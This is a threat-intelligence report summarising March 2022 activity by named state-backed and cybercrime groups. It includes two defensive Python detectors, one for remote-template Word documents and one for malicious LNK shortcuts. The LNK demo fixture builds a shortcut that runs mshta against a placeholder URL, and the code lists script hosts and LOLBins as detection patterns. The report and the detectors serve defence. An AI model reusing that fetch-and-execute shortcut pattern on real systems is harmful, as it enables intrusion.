Monthly Threat Actor Group Intelligence Report, March 2022 (ENG)

This document describes issues related to hacking group activities identified from 21 February 2022 to 20 March 2022 and includes information on the related intrusion incidents and threat events recorded in the ThreatRecon Platform.

1. Characteristics of SectorA Group Activities

In March 2022, activities by a total of 5 hacking groups were identified: SectorA02, SectorA03, SectorA05, SectorA06 and SectorA07.

SectorA02 group was found to be active in South Korea. In this activity, the group impersonated personnel of a South Korean central administrative institution to carry out the attack. The group built phishing websites to collect information and used HWP (Hangul word processor) decoy documents chosen to attract the targets' interest.

SectorA03 group was found to be active in Macao. The group used spear phishing emails to attack employees of 20 companies in Macao, including hotels and restaurants.

SectorA05 group was found to be active in South Korea and Hong Kong. The group sent multiple phishing emails disguised as electronic documents from government institutions.

SectorA06 group was found to be active in South Korea, Japan, France, Singapore, the United States and England. In this activity, the group used CHM (Compiled HTML Help) files, a Windows help file format, in their attacks.

SectorA07 group was found to be active in South Korea. The group used MS Word documents disguised as product information in their attacks.

The ongoing activities of the SectorA hacking groups aim to collect high-value information on South Korean government activities, such as political and diplomatic affairs, while at the same time conducting attacks worldwide to secure financial resources. This objective has held over a long period and is expected to continue unchanged for some time.

2. Characteristics of SectorB Group Activities

In March 2022, activities by a total of 3 hacking groups were identified: SectorB01, SectorB09 and SectorB22.

SectorB01 group was found to be active in the United States, Hong Kong, England, China and Vietnam. The group exploited vulnerabilities in Log4j and USAHerds to penetrate systems. Afterwards, they installed PE (Portable Executable) format malware on the target's system and often used open-source tools to take control of it.

SectorB09 group was found to be active in Taiwan and South Korea. In this activity, the group used ELF (Executable and Linkable Format) malware to collect information from the infected system and to receive commands from the C2 server, such as file transfer, remote shell and proxy mode, that control the malware.

SectorB22 group was found to be active in Russia, Romania, Hong Kong, the Czech Republic, Slovakia, the United States, Belgium and Poland. The group attached compressed files to spear phishing emails in multiple attacks targeting staff of diplomatic institutions in Europe.

The ongoing activities of the SectorB hacking groups are seen to be aimed at collecting high-value information on government activities, such as political and diplomatic affairs, from targets across the whole world.

3. Characteristics of SectorC Group Activities

In March 2022, activities by a total of 6 hacking groups were identified: SectorC01, SectorC04, SectorC05, SectorC08, SectorC15 and SectorC16.

SectorC01 group was found to be active in Ukraine. The group used carefully crafted phishing emails and websites to read emails stored in the target's internal mail system or to exfiltrate them. In this activity, they ran a large-scale credential phishing campaign against users of a Ukrainian media company.

SectorC04 group was found to be active in Taiwan and India. The group used LNK files contained in ISO image files to load malicious DLL files and install penetration-testing tools such as Sliver or Cobalt Strike on the system in order to take control of it. In this activity, they used malicious PDF files disguised as COVID-19 related documents and as material for a meeting with the Indian president.

SectorC05 group was found to be active in the United States. The group builds botnets from IoT (Internet of Things) devices, routers and storage devices; since most IoT devices run Linux, the malware used is mostly in ELF format. In this activity, the botnet targeted a specific company's router devices.

SectorC08 group was found to be active in Ukraine, England, Vietnam, the United States and Spain. The group used malicious MS Word documents that fetch a remote template (template injection) to install PE (Portable Executable) format malware on the target's system and take control of it. In this activity, the decoy documents concerned news about Ukraine or the monitoring of Ukrainian social networks.
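The remote template technique leaves a tell-tale artifact inside the document package itself, so a triage script can flag it without ever opening the file in Word. The Python below is an added example written for this page, not tooling from the report: it walks every relationship part of an OOXML package and lists the relationships that resolve outside the package, with a dedicated check for an attachedTemplate that points at a URL or UNC path, plus a check for an embedded VBA project. The sample .docx is constructed in memory and the hostname is an RFC 2606 placeholder; neither is an indicator from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace shared by every *.rels part in an OOXML package.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_relationships(doc_bytes):
    """List (rels part, relationship type, target) for every relationship with
    TargetMode="External": anything Word resolves outside the package on open."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            # xml.etree does not fetch external entities, so parsing untrusted parts is
            # safe here; swap in defusedxml if your parser stack is less conservative.
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rel_type, rel.get("Target", "")))
    return found


def remote_template_targets(doc_bytes):
    """Targets of attachedTemplate relationships that point outside the package.
    Benign documents attach a local .dotm or nothing; a URL or UNC path here is
    the remote template injection pattern."""
    return [target for _, rel_type, target in external_relationships(doc_bytes)
            if rel_type == "attachedTemplate"]


def has_vba_project(doc_bytes):
    """True if the package carries a VBA project, i.e. the document has macros."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as pkg:
        return any(n.rsplit("/", 1)[-1] == "vbaProject.bin" for n in pkg.namelist())


def _rels_xml(entries):
    rels = "".join(
        f'<Relationship Id="rId{i}" Type="{R_NS}/{rel_type}" Target="{target}"'
        + (' TargetMode="External"' if external else "") + "/>"
        for i, (rel_type, target, external) in enumerate(entries, start=1))
    return f'<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="{REL_NS}">{rels}</Relationships>'


def build_docx(template=None, hyperlink=None):
    """Constructed minimal .docx for the demonstration (not a real sample): only the
    parts the checks above read. `template` becomes a remote attachedTemplate."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"><w:body><w:p/></w:body></w:document>')
        doc_rels = [("styles", "styles.xml", False)]
        if hyperlink:
            doc_rels.append(("hyperlink", hyperlink, True))
        pkg.writestr("word/_rels/document.xml.rels", _rels_xml(doc_rels))
        if template:
            pkg.writestr("word/settings.xml",
                         f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}"><w:attachedTemplate r:id="rId1"/></w:settings>')
            pkg.writestr("word/_rels/settings.xml.rels", _rels_xml([("attachedTemplate", template, True)]))
    return buf.getvalue()


if __name__ == "__main__":
    # Hostname is an RFC 2606 placeholder, not an indicator from the report.
    injected = build_docx(template="http://template.example/news.dotm", hyperlink="https://www.example.org/")
    clean = build_docx(hyperlink="https://www.example.org/")
    for label, doc in (("injected", injected), ("clean", clean)):
        print(label, "remote templates:", remote_template_targets(doc),
              "externals:", external_relationships(doc), "vba:", has_vba_project(doc))
```

Hyperlinks are external relationships too, so the full listing is noisy on real mail; the attachedTemplate check is the one worth alerting on, and a document-type relationship whose target is a UNC path is a second strong signal because it also leaks the NTLM handshake when Word resolves it.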

SectorC15 group was found to be active in Ukraine, France, England, China, the Netherlands, Cyprus, Singapore, Jamaica, Germany, Canada, Denmark, Spain, the Philippines, Serbia, Moldova, Turkey, Saudi Arabia, Russia, the United States and Italy. The group delivered malware written in the Go programming language as attachments to phishing emails on the subject of Ukrainian cybersecurity.

SectorC16 group was found to be active in Ukraine. The group distributed compressed files containing LNK files as phishing email attachments; running the LNK file downloads an HTA file to the computer and executes it. The final payload is malware with backdoor functionality.

The ongoing activities of the SectorC hacking groups are seen to be aimed at collecting high-value information on government activities, such as political and diplomatic affairs, from targets across the whole world, including countries bordering the supporting government.

4. Characteristics of SectorD Group Activities

In March 2022, activity by a total of 1 hacking group was identified: SectorD14.

SectorD14 group was found to be active in Turkey, Israel, Canada and Tunisia. The group used social engineering, impersonating HR department staff to approach victims, and created fake Social Network Service accounts posing as an HR employee to avoid arousing the targets' suspicion. In this activity, they disguised the malware file as a normal PDF document by changing its icon.

The SectorD hacking groups have mostly targeted countries in political conflict with the supporting government, and have recently been seen collecting high-value information, such as the political and diplomatic activities of individuals or governments opposed to the supporting government.

5. Characteristics of SectorE Group Activities

In March 2022, activities by a total of 5 hacking groups were identified: SectorE01, SectorE02, SectorE04, SectorE05 and SectorE06.

SectorE01 group was found to be active in Pakistan. In this activity, the group distributed malicious Excel documents via the Dropbox cloud storage service.

SectorE02 group was found to be active in Finland, Saudi Arabia, the United States, Kenya, England, Nepal, Hong Kong, China and India. The group used MS Word and Excel documents on various topics in their attacks.

SectorE04 group was found to be active in England, Pakistan and Indonesia. The group built phishing websites to collect the targets' information.

SectorE05 group was found to be active in England, the Czech Republic, China, India and the United States. The group continued to use CHM (Compiled HTML Help) files, a help file format, as in its February activities.

SectorE06 group was found to be active in India, the United States, China and England. The group distributed compressed files containing LNK files disguised as military-related documents.
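The SectorE06 activity above, like the SectorC16 activity in section 3 (a shortcut in an archive that fetches an HTA) and the SectorC04 activity (a shortcut inside an ISO), relies on a Windows shortcut to launch the real payload. The Python below is an added example written for this page, not tooling from the report: it decodes the Shell Link header and StringData of each .lnk member in a zip attachment and flags the traits a lure shortcut typically has (a script host or LOLBin as target, a remote location on the command line, a minimised window, a borrowed document icon, a double extension). The archive, the shortcuts and the URL are constructed in memory for the demonstration; the hostname is an RFC 2606 placeholder and nothing here is an indicator from the report.

```python
import io
import re
import struct
import zipfile

# Shell Link (.LNK) layout per the [MS-SHLLINK] specification.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections, in the order they appear when their flag bit is set.
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))
# Script hosts and LOLBins that a document-shaped shortcut has no business launching.
SUSPICIOUS_HOSTS = ("mshta", "powershell", "pwsh", "cmd.exe", "rundll32", "regsvr32",
                    "wscript", "cscript", "certutil", "bitsadmin", "msiexec", "forfiles")
DOCUMENT_ICONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", "acrord32", "winword", "excel.exe")


def parse_lnk(data):
    """Decode the header and StringData of a .LNK file into a dict."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    for bit, field in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        info[field] = data[off:off + count * width].decode("utf-16-le" if width == 2 else "cp1252")
        off += count * width
    return info


def triage_lnk(info):
    """Return the reasons a parsed shortcut looks like a lure (empty list if none)."""
    reasons = []
    launch = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    if any(host in launch for host in SUSPICIOUS_HOSTS):
        reasons.append("launches a script host or LOLBin")
    if "http://" in launch or "https://" in launch or "\\\\" in launch:
        reasons.append("command line references a remote location")
    if info["show_command"] in (2, 7):   # SW_SHOWMINIMIZED / SW_SHOWMINNOACTIVE hide the console
        reasons.append("window minimised on launch")
    if any(marker in info.get("icon_location", "").lower() for marker in DOCUMENT_ICONS):
        reasons.append("icon borrowed from a document viewer or document type")
    if len(info.get("arguments", "")) > 260:   # padding pushes the command out of the Properties dialog
        reasons.append("oversized argument string")
    return reasons


def triage_archive(zip_bytes):
    """Triage every .lnk member of a zip attachment; returns {member name: reasons}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for member in archive.namelist():
            if not member.lower().endswith(".lnk"):
                continue
            reasons = triage_lnk(parse_lnk(archive.read(member)))
            if re.search(r"\.(pdf|docx?|xlsx?|txt)\.lnk$", member, re.IGNORECASE):
                reasons.append("document-style double extension")
            results[member] = reasons
    return results


def build_lnk(relative_path, arguments, icon_location, show_command=1):
    """Constructed shortcut for this demonstration (not a captured sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | IS_UNICODE | sum(bit for bit, _ in STRING_DATA[1:])
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"  # IDList holding only the TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, ".", arguments, icon_location))
    return header + id_list + strings


def sample_attachment():
    """Constructed zip standing in for a phishing attachment; the URL is an RFC 2606 placeholder."""
    lure = build_lnk(r"..\..\..\Windows\System32\mshta.exe", "http://lure.example/update.hta",
                     r"%ProgramFiles%\Adobe\Acrobat\AcroRd32.exe", show_command=7)
    benign = build_lnk(r"..\Tools\tool.exe", "", r"..\Tools\tool.exe")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Military_Report.pdf.lnk", lure)
        archive.writestr("Tools.lnk", benign)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in triage_archive(sample_attachment()).items():
        print(member, "->", reasons or "no findings")
```

Real samples usually carry a LinkTargetIDList and a LinkInfo block before the strings, which the parser skips by their declared sizes; an ISO attachment is handled the same way once its files are extracted (the example reads a zip because the standard library can write one offline). Shortcuts mailed as documents are rare enough in legitimate traffic that any one of these reasons is worth a detonation or a block.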

The ongoing activities of the SectorE hacking groups are seen to be aimed at collecting high-value information on political, diplomatic and military activities. Considering that they have recently expanded their targets to East Asian countries, including China, and to other regions, it is assessed that the proportion of their activity devoted to collecting political, diplomatic and technological information from these countries has increased.

6. Characteristics of SectorH Group Activities

In March 2022, activity by a total of 1 hacking group was identified: SectorH03.

SectorH03 group was found to be active in India, the United States, China and England. The group used documents related to government institutions as decoys to avoid users' suspicion and downloaded multiple malware samples to the victim's system to steal information.

The activities of the SectorH hacking groups consist of both cybercrime and government-backed hacking. Diplomatic clashes between the backing country and its neighbour India are ongoing, so it is assessed that they will continue collecting high-value information on the military and political affairs of Indian government agencies as required.

7. Characteristics of cybercrime group activities

In March 2022, activities by a total of 8 hacking groups were identified: SectorJ03, SectorJ04, SectorJ06, SectorJ09, SectorJ14, SectorJ26, SectorJ42 and SectorJ44.

Unlike the government-backed hacking groups, these groups steal online information that has monetary value in the real world, or directly hack specific companies and organizations to distribute ransomware on their internal networks or to steal confidential industrial information and demand a ransom for it.

SectorJ03 group was found to be active in Palestine. The group changed the icon of its malware to the PDF icon to disguise it as normal PDF files; when executed, the malware displays content about the opening ceremony schedule of the Palestine Central Committee so that it appears to be a normal file.

SectorJ04 group was found to be active in the United States. The group distributed remote access malware or ransomware through phishing emails, with the aim of stealing company information and securing financial resources.

SectorJ06 group was found to be active in the United States, France and Italy. The group distributed MS Word and Excel files with malicious macros inserted and continued to install ransomware on compromised systems to secure financial resources.

SectorJ09 group continued its technique of inserting obfuscated skimming scripts into websites to collect usernames, addresses, emails, phone numbers and credit card payment details on the payment page. They also used malware that collects credentials and cryptocurrency information, advertised as a DDoS tool for attacking Russian companies.

SectorJ14 group was found to be active in Malaysia and Japan. The group has used multiple programming languages to operate across multiple platforms since 2018, and is seen to be carrying out hacking activities with the sole purpose of securing financial resources.

SectorJ26 group was found to be active in Argentina, Ukraine, the United States, South Korea, England, Australia, the Philippines, Switzerland, China, Canada, Israel, Germany, Ireland, the Netherlands, India, Suriname, Iran, Italy and France. The group attached backdoor malware, used to gain control of systems, to phishing emails disguised as business proposals, and is seen to be taking control of systems in order to infect them with ransomware and secure financial resources.

SectorJ42 group was found to be active in Singapore, Estonia, Hong Kong, South Korea, England, Indonesia, Japan, Israel, Taiwan and China. The group used ELF format malware in UNIX and Linux environments for financial gain. In this activity, the ELF malware was used to dispense cash from ATMs (Automated Teller Machines) without authorization.

SectorJ44 group was found to be active in China, Ukraine, Singapore, South Korea, Iran and the United States. The group is seen to have developed a new ransomware.

8. Characteristics of SectorS group activities

In March 2022, activity by a total of 1 hacking group was identified: SectorS01.

SectorS01 group was found to be active in Ecuador, England, Chile, the United States, Israel, Russia, Colombia and South Korea. The group used documents disguised as tax return forms containing a malicious link through which the malware was distributed. On the victim's system, the malware stole system information and downloaded additional malware for execution.

The SectorS group's activities to date aim to collect high-value information on government activities of South American countries, such as political, diplomatic and military affairs.

9. Characteristics of SectorT group activities

In March 2022, activity by a total of 1 hacking group was identified: SectorT01.

SectorT01 group was seen to be active in India, Romania, China, Hungary, the Czech Republic, Sweden, Lithuania, the United States, Latvia, Poland, the Netherlands, Ukraine, Italy, Brazil, Russia, Serbia, Slovakia, the United Kingdom, Moldova and South Korea. The group distributed CHM (Compiled HTML Help) files disguised as COVID-19 related documents in its attacks. In this activity, they installed Cobalt Strike and a backdoor on the target's system to steal information from it. In addition, they deployed wiper malware against the Ukrainian government and its networks to destroy systems.

It is assessed that the purpose of the SectorT hacking group's activities to date is to collect high-value information on government activities of EU countries, such as political, diplomatic and military affairs.

The full report detailing each event together with IoCs (Indicators of Compromise) and recommendations is available to existing NSHC ThreatRecon customers. For more information, please contact RA.global@nshc.net